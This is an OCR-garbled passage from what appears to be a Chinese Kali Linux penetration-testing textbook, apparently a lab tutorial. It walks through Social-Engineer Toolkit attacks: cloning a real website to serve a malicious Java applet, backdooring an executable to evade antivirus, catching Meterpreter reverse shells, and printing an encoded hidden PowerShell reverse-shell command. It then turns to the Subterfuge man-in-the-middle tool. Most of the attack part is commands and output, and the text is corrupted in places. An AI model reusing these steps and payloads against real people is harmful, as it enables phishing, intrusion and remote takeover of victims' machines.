5) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 
set> 


以 上 输出 信息 显示 了 所 有 的 攻击 沫 单列 表 。 
(2) 这 里 选择 社会 工程 学 攻击 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 


set> 1 
.M""bgd 7MM™"YMM MMP"MM""YMM 
„MI "Y MM “TP MM 7 
'"MMb. MM d MM 
'YMMNq. MMmmMM MM 
MM MM Y , MM 


x 2255 
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Mb dM MM ,M MM 
P"Ybmmd" .JMMmmmmMMM .JMML. 


[---] The Social-Engineer Toolkit (SET) [---] 
[---] Created by: David Kennedy (ReL1K) [---] 
[---] Version: 6.0 [---] 
[---] Codename: ‘Rebellion’ [---] 
[---] Follow us on Twitter: @TrustedSec [---] 
[---] Follow me on Twitter: @HackingDave [---] 
[---] Homepage: https://www.trustedsec.com [---] 


Welcome to the Social-Engineer Toolkit (SET). 
The one stop shop for all of your SE needs. 
Join us on irc.freenode.net in channel #setoolkit 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 
11) Third Party Modules 
99) Return back to the main menu. 
set> 


输出 的 信息 显示 了 社会 工程 学 中 ， 可 使 用 的 攻击 列表 。 
(3) 这 里 选择 Web 攻击 同 量 ， 输 入 编写 2。 将 显示 如 下 所 示 的 信息 : 


set> 2 
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to 
compromise the intended victim. 
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based 
payload. Uses a customized java applet created by Thomas Werth to deliver the payload. 
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an 
iframe and deliver a Metasploit payload. 
The Credential Harvester method will utilize web cloning of a web- site that has a username and 
password field and harvest all the information posted to the website. 
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to 
something different. 
The Web-Jacking Attack method was introduced by white sheep, emgent. This method utilizes 
iframe replacements to make the highlighted URL link to appear legitimate however when clicked 
a window pops up then is replaced with the malicious link. You can edit the link replacement 
settings in the set config if its too slow/fast. 
The Multi-Attack method will add a combination of attacks through the web attack menu. For 
example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all 
at once to see which is successful. 

1) Java Applet Attack Method 

2) Metasploit Browser Exploit Method 

3) Credential Harvester Attack Method 

4) Tabnabbing Attack Method 

5) Web Jacking Attack Method 

6) Multi-Attack Web Method 

T) Full Screen Attack Method 

99) Return to Main Menu 

set:webattack> 


XI 
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输出 的 信息 显示 了 Web 攻击 问 量 中 ， 可 使 用 的 攻击 方法 列表 。 
(4) 这 里 选择 Java applet 攻击 方法 ， 输 入 编写 1。 将 显示 如 下 所 示 的 信息 : 


set:webattack>1 

The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 

The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 

The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 
99) Return to Webattack Menu 
set:webattack> 


输出 的 信息 显示 了 Java applet 攻击 的 菜单 列表 。 一 般 情况 下 ， 使 用 前 两 种 。 其 中 第 一 
种 (Web 模块 ) 是 社会 工程 学 创建 一 个 一 般 的 网 页 ;第 二 种 《复制 网 站 ) 是 使 用 已 存在 的 
网 页 作为 一 个 模块 ， 来 攻击 网 页 。 

CS) 这 里 选择 复制 网 站 ， 输 入 编写 2。 将 显示 如 下 所 示 的 信息 : 


set:webattack>2 
[-] NAT/Port Forwarding can be used in the cases where your SET machine is 
[-] not externally exposed and may be a different IP address than your reverse listener. 
set> Are you using NAT/Port Forwarding [yes|no]: no 
# 是 否 使 用 NAT/Port 转发 
[-] Enter the IP address of your interface IP or if your using an external IP, what 
[-] will be used for the connection back and to house the web server (your interface address) 
set:webattack> IP address or hostname for the reverse connection:192.168. 


6.103 # 设 置 攻击 主机 的 地 址 


pee 

Next we need to specify whether you will use your own self generated java applet, built in applet, 
or your own code signed java applet. In this section, you have all three options available. The first 
will create a self-signed certificate if you have the java jdk installed. The second option will use the 
one built into SET, and the third will allow you to import your own java applet OR code sign the 
one built into SET if you have a certificate. 

Select which option you want: 

1. Make my own self-signed certificate applet. 

2. Use the applet built into SET. 

3. | have my own code signing certificate or applet. 


Enter the number you want to use [1-3]: 2 # 先 择 Java applet 类 型 
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of 
Java :( 


[-] SET supports both HTTP and HTTPS 

[-] Example: http://www.thisisafakesite.com 

set: webattack» Enter the url to clone:http://www.qq.com # 设 置 复 制 的 网 页 
[*] Cloning the website: http://www.qq.com 

[*] This could take a little bit... 

[*] Injecting Java Applet attack into the newly cloned website. 

[*] Filename obfuscation complete. Payload name is: vWzsHO 

[*] Malicious java applet website prepped for deployment 

What payload do you want to generate: 
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Name: Description: 

1) Windows Shell Reverse_TCP Spawn a command shell on victim 
and send back to attacker 

2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on 
victim and send back to attacker 

3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and 
send back to attacker 

4) Windows Bind Shell Execute payload and create an 
accepting port on remote system 

5) Windows Bind Shell X64 Windows x64 Command Shell, Bind 
TCP Inline 

6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, 


Reverse TCP Inline 
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker 
(Windows x64), Meterpreter 


8) Windows Meterpreter All Ports Spawn a meterpreter shell and 
find a port home (every port) 
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP 
using SSL and use Meterpreter 
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP 
address and spawn Meterpreter 
11) SE Toolkit Interactive Shell Custom interactive reverse 
toolkit designed for SET 
12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with 
AES encryption support 
13) RATTE HTTP Tunneling Payload Security bypass payload that 
will tunnel all comms over HTTP 
14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter 
payload through shellcodeexec 
15) Pylnjector Shellcode Injection This will drop a meterpreter 


payload through Pylnjector 
16) MultiPyInjector Shellcode Injection This will drop multiple 
Metasploit payloads via memory 
17) Import your own executable Specify a path for your own 
executable 
set: payloads» 


以 上 输出 的 信息 显示 了 可 使 用 的 攻击 载 何 。 
(6) 这 里 选择 Windows Reverse TCP Meterpreter 攻击 载 傈 ， 建 立 一 个 反问 TCP 连接 。 
输入 编号 2， 将 显示 如 下 所 示 的 信息 : 


set:payloads>2 
Select one of the below, 'backdoored executable’ is typically the best. However, 
most still get picked up by AV. You may need to do additional packing/crypting 
in order to get around basic AV detection. 
1) shikata ga nai 
2) No Encoding 
3) Multi-Encoder 
4) Backdoored Executable 
set:encoding>4 Hi FS BA) AY BRAK 
set:payloads> PORT of the listener [443]: # 设 置 监 听 的 端口 号 
[*] Generating x86-based powershell injection code for port: 22 
[*] Generating x86-based powershell injection code for port: 53 
[*] Generating x86-based powershell injection code for port: 443 
[*] Generating x86-based powershell injection code for port: 21 
[*] Generating x86-based powershell injection code for port: 25 
[*] Finished generating powershell injection bypass. 
[*] Encoded to bypass execution restriction policy... 
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[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 
[*] Backdoor completed successfully. Payload is now hidden within a legit executable. 
[*] Apache appears to be running, moving files into Apache's home 


LELLLLLLILLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLII 


Web Server Launched. Welcome to the SET Web Attack. 


LELLLLLLILLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLII 


[--] Tested on Windows, Linux, and OSX [--] 

[--] Apache web server is currently in use for performance. [--] 
[*] Moving payload into cloned website. 

[*] The site has been moved. SET Web Server is now listening.. 
[-] Launching MSF Listener... 

[-] This may take a few to load MSF... 


PX A eg 站 
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Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 

-[ metasploit v4.9.3-2014070201 [core:4.9 api: 1.0] ] 
+ -- --=[ 1315 exploits - 716 auxiliary - 209 post ] 
+ -- --=[ 341 payloads - 35 encoders - 8 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 

[*] Processing /root/.set/meta_config for ERB directives. 

resource (/root/.set/meta_config)> use exploit/multi/handler 
resource (/root/.set/meta config)? set PAYLOAD windows/meterpreter/ 
reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set/meta config)» set LHOST 192.168.6.103 
LHOST => 192.168.6.103 
resource (/root/.set/meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 
resource (/root/.set/meta_config)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta_config)> set LPORT 22 
LPORT => 22 
resource (/root/.set/meta config)» exploit -j 
[*] Exploit running as background job. 
resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set/meta config)» set LHOST 192.168.6.103 
LHOST => 192.168.6.103 
resource (/root/.set/meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 
resource (/root/.set/meta_config)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta_config)> set LPORT 53 
LPORT => 53 
resource (/root/.set/meta config)» exploit -j 
[*] Exploit running as background job. 
resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 
[*] Started reverse handler on 192.168.6.103:22 
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[*] Starting the payload handler... 

PAYLOAD => windows/meterpreter/reverse_tcp 

resource (/root/.set/meta_config)> set LHOST 192.168.6.103 
LHOST => 192.168.6.103 

resource (/root/.set/meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 

resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 

resource (/root/.set/meta_config)> set LPORT 443 

LPORT => 443 

resource (/root/.set/meta config)» exploit -j 

[*] Exploit running as background job. 

resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)? set PAYLOAD windows/meterpreter/ 
reverse tcp 

[*] Started reverse handler on 192.168.6.103:53 

PAYLOAD => windows/meterpreter/reverse tcp 

[*] Starting the payload handler... 

[*] Started reverse handler on 192.168.6.103:443 

resource (/root/.set/meta config)» set LHOST 192.168.6.103 

[*] Starting the payload handler... 

LHOST => 192.168.6.103 

resource (/root/.set/meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 

resource (/root/.set/meta_config)> set ExitOnSession false 
ExitOnSession => false 

resource (/root/.set/meta_config)> set LPORT 21 

LPORT => 21 

resource (/root/.set/meta_config)> exploit -j 

[*] Exploit running as background job. 

resource (/root/.set/meta_config)> use exploit/multi/handler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 

PAYLOAD => windows/meterpreter/reverse tcp 

resource (/root/.set/meta config)» set LHOST 192.168.6.103 
LHOST => 192.168.6.103 

resource (/root/.set/meta config)» set EnableStageEncoding false 
EnableStageEncoding => false 

resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 

resource (/root/.set/meta_config)> set LPORT 25 

LPORT => 25 

resource (/root/.set/meta config)» exploit -j 

[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.6.103:21 

[*] Starting the payload handler... 

msf exploit(handler) > 

[*] Started reverse handler on 192.168.6.103:25 


[*] Starting the payload handler... 


以 上 输出 的 信息 是 攻击 主机 的 相关 配置 。 这 时 候 ， 当 目标 主机 通过 浏览 吉 访 问 攻击 主 
机 时 将 会 被 攻击 。 

CI) 此 时 在 目标 主机 上 访问 攻击 主机 ， 将 出 现 如 图 7.20 所 示 的 界面 。 

(8) 从 该 界面 可 以 看 到 有 一 个 警告 对 话 框 , 询问 是 否 要 运行 该 程序 。 该 对 话 框 就 是 Java 
applet 弹出 的 。 从 名 称 中 可 以 看 到 ， 是 Verified Trusted and secure (VERIFIED) 。 现 在 单 
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击 ” 运 行 ” 投 钮 ， 攻 击 主机 将 会 创建 多 个 远程 会 话 ， 如 下 所 示 : 


es Bs sing 
dy tam |b b 建 议 网 站 v 8) 获取 更 多 附加 模块 了 
[ | D- Hy dA. 页 面 P) 安全 S)~ IR(O)- @~ 


。 是 否 要 运行 该 应 用 


名 称 : Verified Trusted and Secure (VERIFIED) 
发 行者 : AH 
M: http: //192. 168. 6. 103 


Tee TELE CSI A) 。 


p>) rag q J 这 应 用 程序 将 在 不 受 限制 的 访问 权限 下 运行 ， 这 可 能 会 危及 


的 个 人 信息 . HAEREERE I RHONE. 
4 ~ ee 


图 7.20 EN iE 
[*] Sending stage (769536 bytes) to 192.168.6.106 


[*] Meterpreter session 1 opened (192.168.6.103:443 -> 192.168.6.106:50729) at 2014-07-19 
12:23:24 +0800 

[*] Meterpreter session 2 opened (192.168.6.103:21 -> 192.168.6.106:50728) at 2014-07-19 
12:23:25 +0800 

[*] Meterpreter session 3 opened (192.168.6.103:22 -> 192.168.6.106:50727) at 2014-07-19 
12:23:25 +0800 

[*] Meterpreter session 4 opened (192.168.6.103:53 -> 192.168.6.106:50730) at 2014-07-19 
12:23:25 +0800 

msf exploit(handler) > 


从 以 上 输出 的 信息 中 ， 可 以 看 到 创建 了 4 个 会 话 。 此 时 可 以 使 用 sessions 但 看 创 
建 的 会 话 。 
(9) 查看 会 话 。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions 
Active sessions 


Id Type Information Connection 


1 meterpreter x86/win32 WIN- RKPKQFBLG6C\Administrator @ WIN- RKPKQFBLG6C 
192.168.6.103:443 -> 192.168.6.106:50729 (192.168.6.106) 

PA meterpreter x86/win32  WIN-RKPKQFBLG6C Administrator @ WIN-RKPKQFBLG6C 
192.168.6.103:21 -> 192.168.6.106:50728 (192.168.6.106) 

3 meterpreter x86/win32  WIN-RKPKQFBLG6C Administrator @ WIN-RKPKQFBLG6C 
192.168.6.103:22 -> 192.168.6.106:50727 (192.168.6.106) 

4 meterpreter x86/win32 WIN-RKPKQFBLG6C\Administrator @ WIN-RKPKQFBLG6C 
192.168.6.103:53 -> 192.168.6.106:50730 (192.168.6.106) 


从 输出 的 信息 中 ， 可 以 看 到 攻击 主机 使 用 不 同 的 端口 创建 了 四 个 会 话 。 此 时 可 以 选择 
月 列 任 何 一 个 会 语 ， 获取 到 远程 主机 的 命令 行 Shell。 
(10) 启动 会 话 1， 并 获取 远程 主机 的 Shell。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 
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meterpreter > shell 

Process 5056 created. 

Channel 1 created. 

Microsoft Windows [ 口 汾 6.1.7601] 

DDIJODDDD (c) 2009 Microsoft Corporation 口 口 口 口 口 口 口 口 口 口 口 口 
C:\Users\Administrator\Desktop> 


从 输出 的 信息 中 ， 可 以 看 到 成 功 的 获取 到 一 个 远程 Shell. 
7.4.3 PowerShell li [5] = 


在 社会 工程 学 中 , 使 用 基于 Java 的 PowerShell 攻击 回 量 是 非常 重要 的 。 如 果 目 标 主机 
没有 运行 Java， 则 不 能 欺骗 它 访问 攻击 主机 社会 工程 学 的 页 面 ， 将 不 能 进行 攻击 。 所 以 需 
要 使 用 男 一 种 方法 实现 ， 就 是 问 目 标 主 机 发 送 病毒 文件 。 使 用 PowerShell Jii [8] a UA 81] 
££ PowerShell 文件 ， 并 将 创建 好 的 文件 发 送 给 目标 。 当 目标 运行 时 ， 束 可 以 获取 一 个 远程 
连接 。 本 小 节 将 介绍 PowerShell Kerh HE 

【实例 7-3】 使 用 PowerShell 攻击 问 量 创建 PowerShell 文件 ， 并 将 该 文件 发 送 给 目标 
主机 。 具 体操 作 步 又 如 下 所 示 。 

(OD 启动 社会 工程 学 。 执 行 命令 如 下 所 示 : 

Select from the menu: 

1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 
5) Update the Social-Engineer Toolkit 
6) Update SET configuration 


7) Help, Credits, and About 
99) Exit the Social-Engineer Toolkit 


set> 
(2) 选择 社会 工程 学 ， 输 入 编写 1， 如 下 所 示 : 
set> 1 


Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 


11) Third Party Modules 

99) Return back to the main menu. 
set» 
(3) 选择 PowerShell 攻击 问 量 ， 输 入 编写 10。 将 显示 如 下 所 示 的 信息 : 
set> 10 


The Powershell Attack Vector module allows you to create PowerShell specific attacks. These 
attacks will allow you to use PowerShell which is available by default in all operating systems 
Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and 
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performing functions that do not get triggered by preventative technologies. 
1) Powershell Alphanumeric Shellcode Injector 
2) Powershell Reverse Shell 
3) Powershell Bind Shell 
4) Powershell Dump SAM Database 
99) Return to Main Menu 
set:powershell> 


(4) 选择 PowerShell 字母 代码 注入 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 


set:powershell>1 
set> IP address for the payload listener: 192.168.6.103 
# 设 置 攻击 主机 的 地 址 
set:powershell> Enter the port for the reverse [443]: 
# 设 置 反 连接 的 端口 号 ， 这 里 使 用 默认 端口 号 
[*] Prepping the payload for delivery and injecting alphanumeric shellcode... 
[*] Generating x86-based powershell Injection code... 
[*] Finished generating powershell injection bypass. 
[*] Encoded to bypass execution restriction policy... 
[x] If you want the powershell commands and attack, they are exported to 
/root/.set/reports/powershell/ 
set> Do you want to start the listener now [yes/no]: : yes 
# 是 否 现在 监 
Unable to handle kernel NULL pointer dereference at virtual address Oxd34db33f 
EFLAGS: 00010046 
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 
ds: 0018 es:0018 ss: 0018 
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) 
Stack: 90909090990909090990909090 
90909090990909090990909090 
90909090.90909090.90909090 
90909090.90909090.90909090 
90909090.90909090.09090900 
90909090.90909090.09090900 
CCCCCCOCCCCCCCCCCCECCOCCOC 
CCCCCCOCCCCCCCOCCCCCCOCCGC 
SGC Gone co ey 
CCCCCCCCCCCCCCCCCCCCCCCCCC 
CCCCCCCOCCCCCCOCCCCCCCCCCC 


CCCCCCCCCCCCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCCCCCCCCCCCC 


Code: 00 00 00 00 M3 T4 SP LO 1T FR 4M 3W OR K! V3 R5 IO N4 00 00 00 00 
Aiee, Killing Interrupt handler 
Kernel panic: Attempted to kill the idle task! 
In swapper task - not syncing 
Payload caught by AV? Fly under the radar with Dynamic Payloads in 
Metasploit Pro -- learn more on http://rapid7.com/metasploit 
=[ metasploit v4.9.3-2014070201 [core:4.9 api:1.0] ] 
+ -- --=[ 1315 exploits - 716 auxiliary - 209 post ] 
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+ +--=[ 341 payloads - 35 encoders - 8 nops ] 

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives. 
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler 
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

resource (/root/.set/reports/powershell/powershell.rc)> set Iport 443 

Iport => 443 

resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0 
LHOST => 0.0.0.0 

resource (/root/.set/reports/powershell/powershell.rc)> exploit -j 

[*] Exploit running as background job. 

msf exploit(handler) > 

[*] Started reverse handler on 0.0.0.0:443 

[*] Starting the payload handler... 


输出 的 信息 显示 了 攻击 主机 的 配置 信息 。 此 时 已 经 成 功 启动 了 攻击 载荷 ， 等 待 目 标 主 
机 的 连接 。 以 上 设置 完成 后 ， 将 会 在 /root.setreports/powershell/ 目 录 下 创建 了 一 个 渗透 攻 
击 代码 文件 。 该 文件 是 一 个 文本 文件 ， 其 文件 名 为 x86_powershell_injection.txt. 

(5) 此 时 再 打开 一 个 终端 窗口 ， 查 看 渗透 攻击 文件 的 内 容 ， 如 下 所 示 : 


root@kali:~# cd /root/.set/reports/powershell/ 

root@kali:~/.set/reports/powershell# Is 

powershell.rc x86 powershell injection.txt 

root@kali:~/.set/reports/powershell# cat x86 powershell injection.txt 

powershell -nop -windows hidden -noni -enc JAAXACAAPQAgACCAJABjACAAPQAgACCAJwBb 
AEQAbABsAEkAbQBwAG8AcgBOACgAIgBrAGUAcgBuAGUAbAAZADIALGBkKAGWAbAAIACkAX 
QBWAHUAY gBsAGkAY wAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdAB 
QAHQAcgAgAFY AaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBUAHQAUABOAHIAIABsA 
HAAQQBkAGQAcgBIAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBIACWAIAB1AGkA 
bgBOACAAZgBsAEEAbABsAG8AY wBhAHQAaQBvAGAAVABSAHAAZQASACAAdQBpAGAAdA 
AgAGYAbABQAHIAbwBOAGUAYwBOACKAOWBbAEQAbABSAEkKAbQBwAGS8AcgBOACgAIgBrA 
GUAcgBuAGUAbAAZzADIALgBkKAGwAbAAIACKAXQBWAHUAY gBsAGKkAY wAgAHMAdABhAHQ 
AaQBjACAAZQBAAHQAZQByAGAAIABJAGAAdABQAHQAcgAgAEMACgBIAGEAdABIAF QAaAB 
yAGUAY QBkACgASQBUAHQAUABOAHIAIABSAHAAVABoAHIAZQBhAGQAQQBOAHQAcgBpA 
GIAdQBOAGUAcwAsACAAdQBpAG4AdAAgAGQAdwB TAHQAY QBjJAGSAUwBpAHoAZQAsACA 
ASQBuAHQAUABOAHIAIABSAHAAUWBOAGEAcgBOAEEAZABkAHIAZQBZAHMALAAgAEkAbg 
BOAFAAdAByACAAbABWAFAAY QByAGEAbDQBIAHQAZQByACwAIAB1AGkAbgBOACAAZAB3A 
EMAcgBIAGEAdABpAG8AbgBGAGWAY QBnAHMALAAgAEkAbgBOAFAAdAByACAAbABWAFQ 
AaAByAGUAY QBkAEkAZAApADSAWwBEAGwWAbABJAGOAcABvAHIAdAAoACIAbQBZAHYAYw 
ByAHQALgBkAGwWAbAAiIACkAXQBwA 


以 上 信息 就 是 x86 powershell injection.txt 文件 中 的 内 容 。 从 第 一 行 可 以 看 出 ， 该 文件 
是 运行 powershell 命令 。 如 条 目标 主机 运行 这 段 代码 , 将 会 与 Kali 主机 打开 一 个 远程 会 话 。 

(6) 此 时 , 可 以 将 x86 powershell injection.txt 文件 中 的 内 容 复 制 到 目标 主机 (Windows 
7) 的 DOS 下 ， 然 后 运行 。Kali 主机 将 会 显示 如 下 所 示 的 信息 : 

[*] Sending stage (769536 bytes) to 192.168.6.106 


[*] Meterpreter session 1 opened (192.168.6.103:443 -> 192.168.6.106:51097) at 2014-07-18 
15:36:00 +0800 


从 输出 的 信息 ， 可 以 看 到 成 功 打 开 了 一 个 Meterpreter 会 话 。 
CD 启动 会 话 1， 并 打开 一 个 远程 Shell。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 
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meterpreter > shell 
Process 636 created. 
Channel 1 created. 


Microsoft Windows [ 口 汾 6.1.7601] 


OOCOUOOD (c) 2009 Microsoft Corporation 口 口 口 口 口 口 口 口 口 口 口 口 
C:\Users\Administrator> 


从 输出 的 信息 中 ， 可 以 看 到 成 功 的 获取 到 一 个 远程 Shell, 


AQ E: 在 以 上 例子 中 ,通过 复制 粘贴 的 方式 将 PowerShell 文本 文件 发 送 给 了 目标 ， 并 执 
行 它 来 获取 远程 Shell。 但 是 实际 情况 下 ， 这 是 不 可 能 的 。 所 以 ， 需 要 将 创建 的 
PowerShell 文本 文件 转换 成 可 执行 的 .exe 文件 或 批 处 理 文件 .bat。 用 户 也 可 以 使 用 
前 面 章节 中 介绍 的 Veil 程序 ， 直 接 创建 .bat 文件 。 


744 自动 化 中 间 人 攻击 工具 Subterfuge 


Subterfuge 是 一 于 用 Python 与 的 中 间 人 攻击 框架 ， 筷 集成 了 一 个 前 端 界面 ， 并 收集 了 
一 些 著 名 的 可 用 于 中 间 人 攻击 的 安全 工具 。 成 功 运行 Subterfuge 需要 Django 和 scapy 等 模 
Bt, fr Subterfuge 安装 包 的 dependencies Hae F, fet | Subterfuge 所 需 的 Python 模块 。 
本 小 节 将 介绍 Subterfuge 工具 的 安装 和 使 用 。 

【实例 7-4】 x Subterfuge 工具 。 具 体操 作 步 又 如 下 所 示 。 

(1) 到 http://code.google.com/p/subterfuge/downloads/list 网 站 下 载 Subterfuge 软件 包 ， 
其 软件 包 名 为 subterfuge packages.tar.gz. 

(2) 解压 Subterfuge 软件 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# tar zxvf subterfuge_packages.tar.gz 


(3) 安装 Subterfuge 软件 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# cd subterfuge/ 
root@kali:~/subterfuge# python install.py 


执行 以 上 命令 后 将 显示 如 图 7.21 所 示 的 界面 。 


Subterfuge Installer 


Installation 中 ptionS on 


Full Install With Depencencies © Simple Install 


^ó — 


图 7.21 安装 Subterfuge 界面 
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(4 六 在 该 界面 选择 Full Install With Depencencies 选项 ， 并 单 击 Install 按钮 。 安 装 完 成 
后 7 将 显示 如 图 7.22 所 示 的 界面 。 


r 


-æ | | E iei oes 


The setup is 
complete. Thank 
you for installing 
Subterfuge. 


Finish 


* Full Install With Depencencies ‘ Simple Install 


E 


图 7.22 安装 完成 


(5) 从 该 界面 可 以 看 到 弹出 一 个 小 对 话 框 , 显示 Subterfuge 安装 完成 。 此 时 , 单 击 Finish 
FAL wt HY DA SE X RE e 

CSG) 7-5] 使 用 Subterfuge LH. AER TE TRU RATAN. 

(1) 启动 Suberfuge 工具 。 执 行 命令 如 下 所 示 : 

root@kali:~# subterfuge 


执行 以 上 命令 后 ， 将 显示 如 下 所 示 的 信息 : 


Subterfuge courtesy of rOOtOv3rr1d3 & Osm0s1z 
Validating models... 

0 errors found 

Django version 1.3.1, using settings 'subterfuge.settings' 
Development server is running at http://127.0.0.1:80/ 
Quit the server with CONTROL-C. 


(2) 打开 浏览 器 ， 并 输入 127.0.0.1:80 访问 Subterfuge 的 主 界面 ， 如 图 7.23 所 示 。 


Subterfuge - Iceweasel Id HE m 


File Edit View History Bookmarks Tools Help 
S Subterfuge | ER 
E 127.0.0.1 v @ 


Most Visitedv [\§Offensive Security Ñ Kali Linux “& Kali Docs EJ Exploit-DB BW Aircrack-ng 


& SUBTERFUGE Modules -i Settings == Start 


Source Username Password Date 


图 7.23 Subterfuge 主 界面 
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(3 六 从 该 界面 可 以 看 到 显示 了 一 个 Modules 和 Settings 菜单 ， 并 且 还 有 一 个 Start 按钮 。 

在 Subterfuge 界面 的 Modules 荣 单 下 ， 可 以 选择 所 有 提供 的 不 同 模块 进行 攻击 。 使 用 
Settings 菜单 ,可 以 修改 Subterfuge 一 些 功能 , 并 且 局 动 攻击 .下 面 使 用 HTTP Code Injection 
模块 ， 实 现 浏览 器 攻击 。 

【实例 7-6】 演示 使 用 Subterfuge 的 HTTP Code Injection 模块 攻击 浏览 器。 具体 操作 
步骤 如 下 所 示 。 

(1) 在 图 7.23 中 ， 单 击 Modules 菜单 ， 将 显示 如 图 7.24 所 示 的 界面 。 


Plugin Settings 
人 Welcome to the Subterfuge Plugin Menu. This sectio 
to control which plugins are running and customize yo 
Network View 


rodentia! vectors, (Note multiple plugins may be run simultaneo 


P) = 


he te Module Tunnel Block 
Builder 


Denial of Service HTTP Code 
Injection 


图 7.24 所 有 攻击 模块 


(2) 在 该 界面 选择 HTTP Code Injection 模块 ， 将 显示 如 图 7.25 所 示 的 界面 。 
Subterfuge - Iceweasel Te x 


File Edit View History Bookmarks Tools Help 
Subterfuge | dp | 


qu @ 127.0.0.1/plugins/#httpcodeinjection 


Cae Jea 


ExMost Visitedv flloffensive Security \ Kali Linux “& Kali Docs EBExploit-DB BW Aircrack-ng 


Plugin Settings 
ZN Subterfuge's HTTP Code Inject on Module allows a user to inje 
payloads directly into a target's browsing session. Payloads c4 
CIBUM Grn tial be anything from simple javascript/HTML injections to browser 
exploits. You even write your own injects. 
0M 


r ] Running: 
rd 本 browser-autopwn -| 


HER E Module Tunnel Block vacar Custom Inject 
Builder 


Payload: IFrame Injection ~| 
1 


[fi 


Denial of Service HTTP Code 
Injection 


Session NEN ing Ed ba U T 
x 


ploitatio 


[7.285 设置 HITP Code Injection 模块 
(3) 在 该 界面 设置 HTTP Code Injection 模块 的 插件 信息 。 这 里 使 用 默认 设置 ， 并 单 击 
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Apply 按钮 ， 将 显示 如 图 7.26 所 示 的 界面 。 
(4) 该 界面 是 Subterfuge 目 动 打开 的 一 个 Shell 窗口 ， 将 开始 加 载 Metasploit 223 J it 
模块 ， 如 图 7.27 所 示 。 


dheUJ 


lugin with payload generic/shell 


rencearray with payload java/m 


loit multi/bri ava jrel? jm:bean with payload java/meterpre 


hnnuN 
(Np IuhnnuN 


va jrel? provider skeleton with payload jav 


Al Irck 
qhllrck 


, multi“browser/ jave_jrel?_reflection_types with payload java 


